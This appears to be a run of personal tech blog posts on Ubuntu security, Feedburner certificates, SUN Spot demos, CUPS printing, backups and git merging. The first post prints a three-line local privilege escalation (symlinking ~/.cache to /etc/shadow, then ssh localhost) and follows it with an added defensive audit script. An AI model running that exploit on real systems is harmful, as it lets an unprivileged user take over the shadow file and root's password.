uuurrgh... Ubuntu

Ubuntu, you all should know, isn’t my preferred operating system. It’s very nice for Linux beginners and may reduce some manual work on private machines, but having heard about the current bug I’m very confused why we still have to use Ubuntu in our PC pools, why some work groups are emphatic about this system, and why we have to administer their servers and local machines with Ubuntu.

I’m still wondering why simple users on Ubuntu systems can read all log files or the shadow out of the box. That is not the kind of security I’m dreaming about ;)

The actual bug is very simple (via):

rm -rf ~/.cache
ln -s /etc/shadow ~/.cache
ssh localhost

Now you own the shadow file and you are able to modify root’s passphrase! It’s just too easy…

By the way, I tried it myself and got a funny message:

mscharm@SERVER ~ % ssh localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
aa:bb:cc:dd:ee:ff:gg:hh:ii:jj:kk:ll:mm:nn:oo:pp.
Please contact your system administrator.
Add correct host key in /homes/mscharm/.ssh/known_hosts to get rid of this message.
Offending key in /homes/mscharm/.ssh/known_hosts:10
RSA host key for localhost has changed and you have requested strict checking.
Host key verification failed.
255 mscharm@SERVER ~ %

And my friend Rumpel also tried this exploit and after lunch I just heard him saying

fuck, bolted out, by myself...

not able to disable his screensaver. Maybe he changed a little bit too much in his shadow file!? ;)

Fortunately the patch is released, so have a lot of fun while updating your systems. You should reboot after the update, otherwise the bug is still enabled…
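
The following audit is an added example, not part of the original post or of the Ubuntu fix: it looks for the state the three commands leave behind, a .cache in a home directory that is a symbolic link, and a system file whose owner is no longer the expected uid. The function names, the home-directory root and the list of files to check are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): look for the state the three
# commands above leave behind. Function names and arguments are assumptions.

# Print every <home>/.cache directly under $1 that is a symbolic link.
find_cache_symlinks() {
    for dir in "$1"/*/; do
        cache="${dir}.cache"
        if [ -L "$cache" ]; then
            printf 'SYMLINK %s -> %s\n' "$cache" "$(readlink "$cache")"
        fi
    done
    return 0
}

# Print the numeric owner of $1 using POSIX ls (no GNU stat required).
owner_uid() {
    ls -ldn "$1" | awk '{ print $3 }'
}

# Report $1 when it exists and is not owned by uid $2; status 1 on a finding.
check_owner() {
    [ -e "$1" ] || return 0
    actual=$(owner_uid "$1")
    if [ "$actual" != "$2" ]; then
        printf 'OWNER %s uid=%s expected=%s\n' "$1" "$actual" "$2"
        return 1
    fi
    return 0
}

# audit HOME_ROOT EXPECTED_UID FILE...
# Prints all findings and returns 1 if there is at least one, else 0.
audit() {
    home_root=$1
    expected=$2
    shift 2
    report=$(
        find_cache_symlinks "$home_root"
        for f in "$@"; do
            check_owner "$f" "$expected" || :
        done
    )
    [ -n "$report" ] || return 0
    printf '%s\n' "$report"
    return 1
}

# On a real system, run as root so every home directory is readable:
#   audit /home 0 /etc/shadow /etc/passwd /etc/group
```

A SYMLINK line is worth a look on its own; an OWNER line for /etc/shadow means the file's ownership has to be reset and its contents reviewed.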

Google does not like self-signed SSL certs

The last few days my feeds were out of date. I manage them with Google’s solution called feedburner, you may have recognized it.

It seems that the developers of this project changed some stuff; anyway, they did not update my feeds. In the last days (or weeks) I did not have the time to take care of it, but today I found a few minutes.

When I tried to resync my feeds manually I got this nice red error (see also the picture):

There is an issue that must be addressed with your source feed for the feed "binfalse" sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target

This is caused by my Apache redirect directive that redirects all visitors looking for an insecure URL at port 80 to my SSL encrypted content at port 443:

<virtualhost *:80>
...
        Redirect / /
...
</virtualhost>

So you see I’m caring about security ;)

This method worked for a long time, but now feedburner tries to verify the certs, and because of a lack of money I signed my certs myself. So feedburner denies access and doesn’t reread my feeds to update its database. To repair this problem I’m now redirecting only my real content and not the feeds, so feedburner is happy, and why should I care about the secure connection of feedburner to my site..

Nevertheless it is not my preferred solution.

Inactivity? Not in the slightest...

Before anyone thinks I’m hibernating: I’ve just so much to do that there is no time to maintain this blog… Just don’t know what to do first.

This week I had a presentation, topic was “Modeling of Overflow Metabolism in Batch and Fed-Batch Cultures of Escherichia coli”. I also had to submit a study, with the headline “Modeling and evaluation of the dynamic behavior of a fermentation by simulation”, that among others analyzes the dependencies of the ratio of product concentration versus biomass concentration on biological parameters. Additionally this week I finished a work for a friend at the Otto-von-Guericke-Universität Magdeburg. He has to evaluate x-rays taken at a new detector and I developed a tool that does the trick.

As if that were not time-consuming enough, I’m still working on my project work; next week I have to present it in a research seminar (fortunately in German).

The reason I write this article: tomorrow is the so-called Lange Nacht der Wissenschaften (translated by Google: Long Night of Science). Here the different departments of the university present what they are doing, comprehensible for the public. In this event we also have a slot dealing with SUN Spots where I’m presenting some cool stuff I’ve programmed. Planned are some introductions to what Spots are and what they can do, and of course some demos. Among others we are playing with the light sensor and visualize a sunrise and a sunset, we demonstrate how one can regulate a fan depending on the temperature measured with a Spot (to induce a higher temperature a candle is planned, I hope everything will go well and the Spot won’t melt away!). Of course some basic demos are shown, like AirText or the BouncingDemo, and last but not least it is time to play. I have prepared a labyrinth that has to be solved by various people against each other (up to seven people at a time in the same labyrinth, just limited by the number of available Spots), and I also developed a control system for the game Blobby Volley to navigate the Blobbies with a Spot, maybe you’ve heard about it ;) We also wanted to build a little car to drive around a little bit, but I’m not such an engineer so this car isn’t finished…

If you are bored and don’t know what to do tomorrow visit this presentation!! It’s at 8.30 am in room 3.31 at the Von-Seckendorff-Platz 1.

Maybe I’ll publish all the code when there is a little bit of time to write some comments and how-tos.

So you see, I’m very busy at the moment. If anyone has nothing to do, just notify me, I’ll give you something to work on!

Thunderbird to systray

Until version 3 of Thunderbird, or more exactly icedove, I used the add-on New Mail Icon to free the busy space in the task list that the Thunderbird process uses even though I have this window very rarely in the foreground. But it seems that there is no further development in this project, so this software isn’t compatible with the current major release…

On my main desktop I thought I had to live with that, but on my notebook screen there is a lack of space, more than ever, so I had to search for an alternative tool. On my way I found a tool (no add-on) called AllTray, it’s available in the Debian/Ubuntu repository. It can dock any window to your tray, so it doesn’t depend on Thunderbird; you can also dock a terminal or your editor or even a complete (Oracle VM) VirtualBox instance.

For my Thunderbird problem it’s half of the solution, because this tool doesn’t tell me whether there are unread mails. But after some more research I found a real add-on called FireTray that does the desired trick. So more space for other junk ;-)

Serve local printer

I have an old printer, an HP Laserjet 6P. It is very reliable and fast, so no need to buy a new one. But there is a problem (I thought): this printer has no network interface, it is connected with a parallel port to my host. Some minutes ago I racked my brain over how to use this printer with my notebook. Now I’m wondering how easy it is using cups!!

On the server side (the machine that is connected to the printer) you just have to modify this printer and check the field called “Share This Printer”, and in the administration tab just enable “Share printers connected to this system” and “Allow printing from the Internet”.

On your client you only have to publish your server. To do it for the complete system, write the following line in your /etc/cups/client.conf; to set this server only for your local user account, write it to your user’s $HOME/.cups/client.conf:

ServerName SERVER:PORT

You just have to specify the port if your server is not listening on the default port 631.

That’s it! Open a document and try to print! I still cannot believe that it is that easy ;)

Thanks to the cups-team

Need more bandwidth!

Today I got my new notebook, an IdeaPad. I had some concerns about the glare display, never used glare displays but it seems to be no problem and I don’t have a choice, Lenovo doesn’t sell that kind of notebooks without glare displays.

This laptop comes with Windows XP and of course I have to fix this bug ;)

But before I delete the Windows installation and install a proper OS, the original system has to be backed up (I want to test some things before I decide whether to buy the laptop). So I installed the first release of „Ύπνος“ to my USB flash drive and booted into it. To back up the hard drive I mounted a piece of my main machine’s hard drive via sshfs on the laptop and copied the laptop’s hard drive to the other machine:

root@sidux /tmp % mkdir mount
root@sidux /tmp % sshfs user@192.168.0.55:/backup/lenovo mount/
password: 
root@sidux /tmp % dd if=/dev/sda of=/tmp/mount/neu.ddi ibs=1024k obs=8192

Ok, the notebook’s drive holds 160 GB and I just have a 99 ct fast ethernet switch, so you can calculate the time I have to wait… That sucks, doesn’t anyone have a gigabit switch lying around? I would prefer Cisco switches ;)

Hopefully the backup will finish today, so I can play a little bit with the laptop and its luxurious 1280x720 screen resolution on the 10’’ glare display.

Which country is the most stupid

Today I had a conversation with a scientist from Bulgaria who is working with microarrays. He told me some practical experiences of his work. It was very interesting and I learned a lot of things, in spite of the fact that I gave a lecture about microarrays some time ago.

In this talk he said a wonderful sentence:

Früher dachte ich immer die Russen wären dumm, bis ich die Amerikaner kennen gelernt habe!

English translation: Some years ago I thought the Russians are stupid, until I got to know the Americans.

Topic was the structuring of websites of companies. If he has a question he always has to search through the web because everyone tells him the answer is anywhere in there! Affymetrix for example has thousands of user manuals, the intersection of all of these papers is very small, but one paper has hundreds of pages… And I think he is totally right. The arrangement of information today is very terrible, to find what you are searching for is some kind of art! But he doesn’t mince matters. I really like Eastern Europeans ;)

He invited me to his lab tomorrow so I can see how this Affymetrix machinery produces the data that I get to analyze.

Little quickie through Germany

Oh no, not that kind of quickie you might think about! Rumpel and I decided more or less spontaneously to go to Bonn and visit one of our former employees, Martin, and additionally take a little look at SIGINT in Cologne.

So we rented a car at Sixt on Friday morning and met Martin at 5 pm in his flat. Of course our trip was very analog, we didn’t have any navigation device, just printed a route calculated by Google maps and relied on male instinct on the way through Germany and the high traffic in the Ruhr Valley on Friday afternoon before the holiday… What should I say, of course everything went totally well and we had a lot of fun in our little car! You can see some pictures at picasa.

Quickie through Germany

Of course it was a great weekend! We’ve seen a lot of fascinating places in Bonn and Cologne like Cologne cathedral, big ships on the Rhine or the Media Center in Cologne. The events at SIGINT were also interesting, although it cannot be compared with the Chaos Communication Congress in Berlin. In Cologne you’ll always get a chair and the queues are very short. Nevertheless the topics are of high quality.

All in all it was an excellent trip, even though it was very expensive.

Git merging showcase

One of the people who are working with me on some crazy stuff always forgets to pull the newest revision of the repository before changing the content, and so he very often has trouble with different versions when he decides to push his work to the master repository. His current workaround is to check out the complete repository in a new directory and merge his changes by hand into this revision… Here is a little instruction to maximize his productivity and minimize the network traffic.

Let’s assume we have a repository, created like this:

/tmp % git init --bare root

And we have one user, that clones this new repository and inits:

/tmp % git clone root slave1
/tmp % cd slave1
/tmp/slave1 (git)-[master] % echo "line1\nline2" >> testfile
/tmp/slave1 (git)-[master] % cat testfile
line1
line2
/tmp/slave1 (git)-[master] % git add .
/tmp/slave1 (git)-[master] % git commit -m "init"
[master (root-commit) bc7e4da] init
 1 files changed, 2 insertions(+), 0 deletions(-)
 create mode 100644 testfile
/tmp/slave1 (git)-[master] % git push ../root master

So we have some content in our root repo. Another user (our bad guy) clones that repository too:

/tmp % git clone root slave2

So let a bit of time elapse, while user one is changing the root repository so that the testfile may look like this:

/tmp/slave1 (git)-[master] % cat testfile | sed 's/line1/&\nline1a/' > testfile.tmp && mv testfile.tmp testfile
/tmp/slave1 (git)-[master] % cat testfile
line1
line1a
line2

And of course, the changer commits his changes:

/tmp/slave1 (git)-[master] % git commit -a -m "haha, root has changed..."
[master e18f637] haha, root has changed...
 1 files changed, 1 insertions(+), 0 deletions(-)
/tmp/slave1 (git)-[master] % git push ../root master
Counting objects: 5, done.
Writing objects: 100% (3/3), 265 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (3/3), done.
To ../root
   bc7e4da..a04d363  master -> master

Ok, nothing bad happened, but now our special friend decides to work:

/tmp/slave2 (git)-[master] % cat testfile | sed 's/line1/&\nline1b/' > testfile.tmp && mv testfile.tmp testfile
/tmp/slave2 (git)-[master] % cat testfile
line1
line1b
line2
/tmp/slave2 (git)-[master] % git commit -a -m "oops, i am very stupid..."
[master d691ada] oops, i am very stupid...
 1 files changed, 1 insertions(+), 0 deletions(-)

What do you think will happen if he tries to push his changes to the master repo? You’re right, nothing but an error:

/tmp/slave2 (git)-[master] % git push ../root master
To ../root
 ! [rejected]        master -> master (non-fast-forward)
error: failed to push some refs to '../root'
To prevent you from losing history, non-fast-forward updates were rejected
Merge the remote changes before pushing again.  See the 'Note about
fast-forwards' section of 'git push --help' for details.

Mmmh, so let’s try to pull the root repo:

/tmp/slave2 (git)-[master] % git pull ../root master
remote: Counting objects: 5, done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (3/3), done.
From ../root
 * branch            master     -> FETCH_HEAD
Auto-merging testfile
CONFLICT (content): Merge conflict in testfile
Automatic merge failed; fix conflicts and then commit the result.

Our friend would now check out the whole repository and insert his changes by hand, but what’s the better solution? Merging the file! Git has a function called mergetool, with which you can merge the conflicts with a program of your choice. Some examples are vimdiff, xxdiff, emerge or, for GUI lovers, kdiff3. In this post I’ll use vimdiff:

/tmp/slave2 (git)-[master|merge] % git mergetool --tool=vimdiff testfile

Normal merge conflict for 'testfile':
  {local}: modified
  {remote}: modified
Hit return to start merge resolution tool (vimdiff): 
3 files to edit

So change the conflicting file(s), you will also see the changes made in root’s and in your local revision. If you’re done just save it and commit your merge:

/tmp/slave2 (git)-[master|merge] % git commit -m "merged"
[master 6be1482] merged

Great, now there is nothing that prevents you from pushing your changes to the root repository:

/tmp/slave2 (git)-[master] % git push ../root master
Counting objects: 10, done.
Delta compression using up to 2 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (6/6), 555 bytes, done.
Total 6 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (6/6), done.
To ../root
   a04d363..6be1482  master -> master

I think this way of solving such conflicts may be much more efficient than cloning the whole repository again and again and again ;)

First SUN Spot results

One week has passed since I got a package of Spots; this weekend I found some time to hack a little bit with these funny components.

First of all I programmed a tool that visualizes the Spot’s movement in an OpenGL frame that draws a virtual Spot. Nice for demonstrations, but nothing spectacular.

After that I developed a little mouse emulator that translates Spot movement to mouse motions on the screen. Here the Spot isn’t doing anything intelligent, it only sends its tilt status every 25 ms as well as switch events to broadcast. Another Spot, working as basestation connected to my machine, is listening to this talking Spot and my host analyzes the received values. To move the mouse on the screen or to generate a click I use the Robot class of the Java AWT package. Long story short, a video may explain it more understandably (via YouTube):

I will continue working on these libraries before I publish them in another post. So look forward to the release ;-)